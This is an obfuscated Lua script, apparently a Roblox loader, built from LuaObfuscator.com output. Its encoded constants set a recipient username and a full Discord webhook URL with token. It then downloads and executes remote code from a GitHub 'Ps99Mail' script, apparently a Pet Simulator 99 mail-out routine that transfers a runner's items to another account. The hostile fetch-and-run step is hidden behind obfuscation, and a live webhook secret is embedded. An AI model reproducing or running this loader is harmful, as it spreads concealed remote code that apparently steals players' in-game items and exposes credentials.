--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.21) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v88=0;local v89;while true do if (v88==1) then return v89;end if (v88==0) then v89=v5(v82,v19);v19=nil;v88=1;end end else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-1) -(v32-(1 -0))) + 1)) ;return v83-(v83%(1 + (1270 -(226 + 1044)))) ;else local v84=((3827 -2948) -((399 -(32 + 85)) + 595))^(v32-((2 + 0) -1)) ;return (((v31%(v84 + v84))>=v84) and (620 -(555 + 64))) or (931 -((1922 -(68 + 997)) + 74)) ;end end local function v21()local v34=957 -(892 + 65) ;local v35;while true do if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1 -(180 -(67 + 113))) ;v34=1 -0 ;end if (v34==(351 -(87 + 263))) then return v35;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (4 -2) ;return (v37 * (189 + 67)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (11 -8) );v18=v18 + (6 -2) ;return (v41 * (16778168 -(802 + 150))) + (v40 * 65536) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=(318 + 680) -((3809 -2894) + 49 + 33) ;local v45=(v20(v43,2 -1 ,12 + 8 ) * ((2 -0)^(1219 -(1069 + 97 + 21)))) + v42 ;local v46=v20(v43,47 -26 ,113 -82 );local v47=((v20(v43,69 -37 )==(1 + 0)) and  -(1 -0)) or (1 + 0) ;if (v46==(791 -(368 + 423))) then if (v45==0) then return v47 * (0 -(0 -0)) ;else local v90=0;while true do if (v90==(18 -(10 + 8))) then v46=(775 -(201 + 571)) -2 ;v44=442 -((1554 -(116 + 1022)) + 26) ;break;end end end elseif (v46==(6535 -4488)) then return ((v45==(0 + 0)) and (v47 * ((1 -0)/(438 -((1004 -(814 + 45)) + 293))))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((432 -(44 + 386))^(1538 -(998 + 488))))) ;end local function v25(v48)local v49;if  not v48 then local v85=0 -0 ;while true do if (v85==(0 + (0 -0))) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(886 -(261 + 624)) );v18=v18 + v48 ;local v50={};for v66=1, #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if ((4 -1)==v51) then v58=nil;v59=nil;v51=4;end if (v51==2) then v56=nil;v57=nil;v51=344 -(218 + 123) ;end if (v51~=(1582 -(1535 + 46))) then else v54=nil;v55=nil;v51=2 + 0 ;end if (v51~=4) then else while true do if (v52~=0) then else local v97=0 + 0 ;local v98;while true do if (v97==(560 -(306 + 254))) then v98=0 + 0 ;while true do if (v98==(1 -0)) then v52=1468 -(899 + 568) ;break;end if (v98==0) then v53=0;v54=nil;v98=1;end end break;end end end if (v52==1) then v55=nil;v56=nil;v52=2 + 0 ;end if (v52==3) then v59=nil;while true do local v101=0;local v102;local v103;while true do if (v101==1) then while true do if (0~=v102) then else v103=0;while true do if (v103~=1) then else if (v53==(2 -1)) then local v153=0;local v154;while true do if (v153~=0) then else v154=0;while true do if (v154==(604 -(268 + 335))) then v59={};v53=292 -(60 + 230) ;break;end if (v154~=0) then else v57={v54,v55,nil,v56};v58=v23();v154=1457 -(282 + 1174) ;end end break;end end end if (v53==0) then local v155=0;local v156;while true do if (v155~=(811 -(569 + 242))) then else v156=0 -0 ;while true do if (v156~=0) then else local v167=0;while true do if (0==v167) then v54={};v55={};v167=1 + 0 ;end if ((1025 -(706 + 318))~=v167) then else v156=1252 -(721 + 530) ;break;end end end if (v156~=(1272 -(945 + 326))) then else v56={};v53=1;break;end end break;end end end break;end if (v103==(0 -0)) then if (v53==2) then local v157=0 + 0 ;while true do if (v157~=(700 -(271 + 429))) then else local v162=0 + 0 ;while true do if (v162==(1500 -(1408 + 92))) then for v170=1087 -(461 + 625) ,v58 do local v171=1288 -(993 + 295) ;local v172;local v173;local v174;local v175;while true do if (v171==1) then v174=nil;v175=nil;v171=1 + 1 ;end if (v171==2) then while true do if ((1171 -(418 + 753))~=v172) then else v173=0 + 0 ;v174=nil;v172=1 + 0 ;end if ((1 + 0)==v172) then v175=nil;while true do if (v173==(0 + 0)) then v174=v21();v175=nil;v173=530 -(406 + 123) ;end if (v173==1) then if (v174==1) then v175=v21()~=(1769 -(1749 + 20)) ;elseif (v174==(1 + 1)) then v175=v24();elseif (v174~=(1325 -(1249 + 73))) then else v175=v25();end v59[v170]=v175;break;end end break;end end break;end if (v171==0) then v172=0 + 0 ;v173=nil;v171=1;end end end v57[3]=v21();v162=1;end if (v162==(1146 -(466 + 679))) then v157=1;break;end end end if (v157==(2 -1)) then for v163=2 -1 ,v23() do local v164=0;local v165;local v166;while true do if (1==v164) then while true do if ((1900 -(106 + 1794))==v165) then v166=v21();if (v20(v166,1,1)~=(0 + 0)) then else local v178=0 + 0 ;local v179;local v180;local v181;local v182;local v183;while true do if (v178==(5 -3)) then v183=nil;while true do if (v179~=2) then else while true do if (v180==(2 -1)) then local v189=114 -(4 + 110) ;local v190;while true do if (v189==0) then v190=0;while true do if (v190~=(585 -(57 + 527))) then else v180=1429 -(41 + 1386) ;break;end if (v190~=(103 -(17 + 86))) then else local v200=0;local v201;while true do if ((0 + 0)==v200) then v201=0 -0 ;while true do if (v201==(0 -0)) then v183={v22(),v22(),nil,nil};if (v181==(0 -0)) then local v203=0 + 0 ;local v204;while true do if (v203==(0 + 0)) then v204=0;while true do if (v204~=(0 -0)) then else v183[3]=v22();v183[4]=v22();break;end end break;end end elseif (v181==(66 -(30 + 35))) then v183[3 + 0 ]=v23();elseif (v181==(1259 -(1043 + 214))) then v183[3]=v23() -(2^(60 -44)) ;elseif (v181==3) then local v213=1212 -(323 + 889) ;local v214;while true do if (v213==(0 -0)) then v214=0;while true do if (0==v214) then v183[3]=v23() -((582 -(361 + 219))^16) ;v183[324 -(53 + 267) ]=v22();break;end end break;end end end v201=1;end if (v201==1) then v190=1;break;end end break;end end end end break;end end end if ((1 + 2)==v180) then if (v20(v182,416 -(15 + 398) ,3)==(983 -(18 + 964))) then v183[14 -10 ]=v59[v183[3 + 1 ]];end v54[v163]=v183;break;end if (v180~=0) then else local v192=0 + 0 ;local v193;while true do if (v192==0) then v193=850 -(20 + 830) ;while true do if (v193~=(0 + 0)) then else v181=v20(v166,2,129 -(116 + 10) );v182=v20(v166,1 + 3 ,6);v193=1;end if (v193==(739 -(542 + 196))) then v180=1 -0 ;break;end end break;end end end if (v180~=2) then else local v194=0 + 0 ;local v195;local v196;while true do if (v194==1) then while true do if (v195==0) then v196=0 + 0 ;while true do if (v196~=1) then else v180=3;break;end if (v196~=(0 + 0)) then else local v202=0;while true do if (v202==(2 -1)) then v196=2 -1 ;break;end if (v202==(1551 -(1126 + 425))) then if (v20(v182,1,1)==1) then v183[407 -(118 + 287) ]=v59[v183[2]];end if (v20(v182,2,2)==(3 -2)) then v183[1124 -(118 + 1003) ]=v59[v183[8 -5 ]];end v202=1;end end end end break;end end break;end if (v194~=0) then else v195=377 -(142 + 235) ;v196=nil;v194=4 -3 ;end end end end break;end if (v179==(1 + 0)) then local v186=0;while true do if (1==v186) then v179=2;break;end if (0==v186) then v182=nil;v183=nil;v186=978 -(553 + 424) ;end end end if (v179==(0 -0)) then local v187=0 + 0 ;local v188;while true do if ((0 + 0)==v187) then v188=0;while true do if (v188~=1) then else v179=1;break;end if (v188==(0 + 0)) then local v199=0;while true do if (v199==1) then v188=1;break;end if (v199~=0) then else v180=0;v181=nil;v199=1;end end end end break;end end end end break;end if (v178~=1) then else v181=nil;v182=nil;v178=1 + 1 ;end if (v178~=0) then else local v184=0 + 0 ;while true do if (v184==0) then v179=0 -0 ;v180=nil;v184=2 -1 ;end if (v184~=(2 -1)) then else v178=1 + 0 ;break;end end end end end break;end end break;end if (v164==0) then v165=0;v166=nil;v164=4 -3 ;end end end v53=756 -(239 + 514) ;break;end end end if (3==v53) then local v158=0;local v159;while true do if (v158==(0 + 0)) then v159=0;while true do if (v159==(1329 -(797 + 532))) then local v169=0 + 0 ;while true do if (v169==0) then for v176=1 + 0 ,v23() do v55[v176-1 ]=v28();end return v57;end end end end break;end end end v103=1;end end break;end end break;end if (v101==(0 -0)) then v102=0;v103=nil;v101=1203 -(373 + 829) ;end end end break;end if (v52~=(733 -(476 + 255))) then else local v99=1130 -(369 + 761) ;local v100;while true do if (v99~=(0 + 0)) then else v100=0 -0 ;while true do if (v100==(1 -0)) then v52=3;break;end if (v100==0) then local v104=238 -(64 + 174) ;while true do if (v104==(1 + 0)) then v100=1 -0 ;break;end if ((336 -(144 + 192))~=v104) then else v57=nil;v58=nil;v104=1;end end end end break;end end end end break;end if (v51==(216 -(42 + 174))) then v52=0;v53=nil;v51=1 + 0 ;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v87=0;while true do if (v87==1) then if (v81<=9) then if (v81<=4) then if (v81<=1) then if (v81>0) then v78[v80[2]]=v80[3];else v78[v80[2]]();end elseif (v81<=2) then local v107=v80[2];v78[v107]=v78[v107](v13(v78,v107 + 1 ,v73));elseif (v81==3) then v78[v80[2]]();else v72=v80[3];end elseif (v81<=6) then if (v81>5) then do return;end else do return;end end elseif (v81<=7) then local v109=v80[2];local v110,v111=v71(v78[v109](v13(v78,v109 + 1 ,v80[3])));v73=(v111 + v109) -1 ;local v112=0;for v126=v109,v73 do local v127=0;while true do if (0==v127) then v112=v112 + 1 ;v78[v126]=v110[v112];break;end end end elseif (v81>8) then v62[v80[3]]=v78[v80[2]];else v62[v80[3]]=v78[v80[2]];end elseif (v81<=14) then if (v81<=11) then if (v81==10) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v72=v80[3];end elseif (v81<=12) then local v114=v80[2];local v115=v78[v80[3]];v78[v114 + 1 ]=v115;v78[v114]=v115[v80[4]];elseif (v81==13) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else local v134=v80[2];local v135=v78[v80[3]];v78[v134 + 1 ]=v135;v78[v134]=v135[v80[4]];end elseif (v81<=16) then if (v81==15) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end else local v119=0;local v120;local v121;local v122;local v123;while true do if (v119==2) then for v148=v120,v73 do local v149=0;while true do if (v149==0) then v123=v123 + 1 ;v78[v148]=v121[v123];break;end end end break;end if (v119==1) then v73=(v122 + v120) -1 ;v123=0;v119=2;end if (v119==0) then v120=v80[2];v121,v122=v71(v78[v120](v13(v78,v120 + 1 ,v80[3])));v119=1;end end end elseif (v81<=17) then v78[v80[2]]=v80[3];elseif (v81>18) then local v142=v80[2];v78[v142]=v78[v142](v13(v78,v142 + 1 ,v73));elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;break;end if (v87==0) then v80=v68[v72];v81=v80[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403443O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A726578735363726970742F50732O394D61696C2F6D61696E2F50732O392E6C756103083O00557365726E616D65030B3O007068616E616E686E2O6F6403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313230393133313334333230382O37353638302F4D54425F66376357305468764D3332384B7166587A78523039713578476E5942473246516176587739706B616F677041456D42443136314A67507779717072455841435500143O0012113O00013O00260D3O000B0001000200040B3O000B000100120F000100033O00120F000200043O00200E000200020005001211000400064O0010000200044O001300013O00024O00010001000100040B3O0013000100260D3O00010001000100040B3O00010001001211000100083O001208000100073O0012110001000A3O001208000100093O0012113O00023O00040B3O000100012O00063O00017O00",v9(),...);